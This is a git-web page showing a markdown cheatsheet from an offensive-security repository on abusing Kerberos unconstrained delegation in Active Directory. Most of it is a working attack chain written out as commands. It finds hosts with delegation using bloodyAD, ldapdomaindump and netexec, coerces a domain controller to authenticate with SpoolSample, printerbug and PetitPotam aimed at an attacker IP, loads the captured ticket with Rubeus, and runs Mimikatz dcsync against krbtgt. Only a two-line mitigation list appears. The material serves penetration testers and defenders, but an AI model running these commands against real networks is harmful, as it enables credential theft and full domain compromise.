daemon-sec-cheatsheet

The cheatsheet vault for operators: AD, enumeration, exploitation, priv-esc, web, DFIR
git clone https://git.daemon-sec.xyz/daemon-sec-cheatsheet.git
Log | Files | Refs | README | LICENSE

kerberos-delegation-unconstrained.md (5668B)


      1 ---
      2 title: "Kerberos Delegation - Unconstrained Delegation"
      3 section: "Active Directory"
      4 sectionSlug: "active-directory"
      5 sourcePath: "docs/active-directory/kerberos-delegation-unconstrained.md"
      6 sourceUrl: "https://github.com/swisskyrepo/InternalAllTheThings/blob/203bb0c0b290/docs/active-directory/kerberos-delegation-unconstrained.md"
      7 sha: "203bb0c0b290"
      8 isIndex: false
      9 ---
     10 
     11 # Kerberos Delegation - Unconstrained Delegation
     12 
     13 > The user sends a ST to access the service, along with their TGT, and then the service can use the user's TGT to request a ST for the user to any other service and impersonate the user.
     14 > When a user authenticates to a computer that has unrestricted kerberos delegation privilege turned on, authenticated user's TGT ticket gets saved to that computer's memory.
     15 
     16 :warning: Unconstrained delegation used to be the only option available in Windows 2000
     17 
     18 > **Warning**
     19 > Remember to coerce to a HOSTNAME if you want a Kerberos Ticket
     20 
     21 ## SpoolService Abuse with Unconstrained Delegation
     22 
     23 The goal is to gain DC Sync privileges using a computer account and the SpoolService bug.
     24 
     25 **Requirements**:
     26 
     27 - Object with Property **Trust this computer for delegation to any service (Kerberos only)**
     28 - Must have **ADS_UF_TRUSTED_FOR_DELEGATION**
     29 - Must not have **ADS_UF_NOT_DELEGATED** flag
     30 - User must not be in the **Protected Users** group
     31 - User must not have the flag **Account is sensitive and cannot be delegated**
     32 
     33 ### Find delegation
     34 
     35 :warning: : Domain controllers usually have unconstrained delegation enabled.
     36 Check the `TRUSTED_FOR_DELEGATION` property.
     37 
     38 - [ADModule](https://github.com/samratashok/ADModule)
     39 
     40   ```powershell
     41   # From https://github.com/samratashok/ADModule
     42   PS> Get-ADComputer -Filter {TrustedForDelegation -eq $True}
     43   ```
     44 
     45 - [bloodyAD](https://github.com/CravateRouge/bloodyAD)
     46 
     47   ```ps1
     48   bloodyAD -u user -p 'totoTOTOtoto1234*' -d crash.lab --host 10.100.10.5 get search --filter '(&(objectCategory=Computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))' --attr sAMAccountName,userAccountControl
     49   ```
     50   
     51 - [ldapdomaindump](https://github.com/dirkjanm/ldapdomaindump)
     52 
     53   ```powershell
     54   $> ldapdomaindump -u "DOMAIN\\Account" -p "Password123*" 10.10.10.10   
     55   grep TRUSTED_FOR_DELEGATION domain_computers.grep
     56   ```
     57 
     58 - [netexec module](https://github.com/Pennyw0rth/NetExec/wiki)
     59 
     60   ```powershell
     61   nxc ldap 10.10.10.10 -u username -p password --trusted-for-delegation
     62   ```
     63 
     64 - BloodHound: `MATCH (c:Computer {unconstraineddelegation:true}) RETURN c`
     65 - Powershell Active Directory module: `Get-ADComputer -LDAPFilter "(&(objectCategory=Computer)(userAccountControl:1.2.840.113556.1.4.803:=524288))" -Properties DNSHostName,userAccountControl`
     66 
     67 ### SpoolService status
     68 
     69 Check if the spool service is running on the remote host
     70 
     71 ```powershell
     72 ls \\dc01\pipe\spoolss
     73 python rpcdump.py DOMAIN/user:password@10.10.10.10
     74 ```
     75 
     76 ### Monitor with Rubeus
     77 
     78 Monitor incoming connections from Rubeus.
     79 
     80 ```powershell
     81 Rubeus.exe monitor /interval:1 
     82 ```
     83 
     84 ### Force a connect back from the DC
     85 
     86 Due to the unconstrained delegation, the TGT of the computer account (DC$) will be saved in the memory of the computer with unconstrained delegation. By default the domain controller computer account has DCSync rights over the domain object.
     87 
     88 > SpoolSample is a PoC to coerce a Windows host to authenticate to an arbitrary server using a "feature" in the MS-RPRN RPC interface.
     89 
     90 ```powershell
     91 # From https://github.com/leechristensen/SpoolSample
     92 .\SpoolSample.exe VICTIM-DC-NAME UNCONSTRAINED-SERVER-DC-NAME
     93 .\SpoolSample.exe DC01.HACKER.LAB HELPDESK.HACKER.LAB
     94 # DC01.HACKER.LAB is the domain controller we want to compromise
     95 # HELPDESK.HACKER.LAB is the machine with delegation enabled that we control.
     96 
     97 # From https://github.com/dirkjanm/krbrelayx
     98 printerbug.py 'domain/username:password'@<VICTIM-DC-NAME> <UNCONSTRAINED-SERVER-DC-NAME>
     99 
    100 # From https://gist.github.com/3xocyte/cfaf8a34f76569a8251bde65fe69dccc#gistcomment-2773689
    101 python dementor.py -d domain -u username -p password <UNCONSTRAINED-SERVER-DC-NAME> <VICTIM-DC-NAME>
    102 ```
    103 
    104 If the attack worked you should get a TGT of the domain controller.
    105 
    106 ### Load the ticket
    107 
    108 Extract the base64 TGT from Rubeus output and load it to our current session.
    109 
    110 ```powershell
    111 .\Rubeus.exe asktgs /ticket:<ticket base64> /service:LDAP/dc.lab.local,cifs/dc.lab.local /ptt
    112 ```
    113 
    114 Alternatively you could also grab the ticket using Mimikatz :  `mimikatz # sekurlsa::tickets`
    115 
    116 Then you can use DCsync or another attack : `mimikatz # lsadump::dcsync /user:HACKER\krbtgt`
    117 
    118 ### Mitigation
    119 
    120 - Ensure sensitive accounts cannot be delegated
    121 - Disable the Print Spooler Service
    122 
    123 ## MS-EFSRPC Abuse with Unconstrained Delegation
    124 
    125 Using `PetitPotam`, another tool to coerce a callback from the targeted machine, instead of `SpoolSample`.
    126 
    127 ```bash
    128 # Coerce the callback
    129 git clone https://github.com/topotam/PetitPotam
    130 python3 petitpotam.py -d $DOMAIN -u $USER -p $PASSWORD $ATTACKER_IP $TARGET_IP
    131 python3 petitpotam.py -d '' -u '' -p '' $ATTACKER_IP $TARGET_IP
    132 
    133 # Extract the ticket
    134 .\Rubeus.exe asktgs /ticket:<ticket base64> /ptt
    135 ```
    136 
    137 ## References
    138 
    139 - [Exploiting Unconstrained Delegation - Riccardo Ancarani - 28 APRIL 2019](https://www.riccardoancarani.it/exploiting-unconstrained-delegation/)
    140 - [Hunting in Active Directory: Unconstrained Delegation & Forests Trusts - Roberto Rodriguez - Nov 28, 2018](https://posts.specterops.io/hunting-in-active-directory-unconstrained-delegation-forests-trusts-71f2b33688e1)
    141 - [Wagging the Dog: Abusing Resource-Based Constrained Delegation to Attack Active Directory - Elad Shamir - 28 January 2019](https://shenaniganslabs.io/2019/01/28/Wagging-the-Dog.html)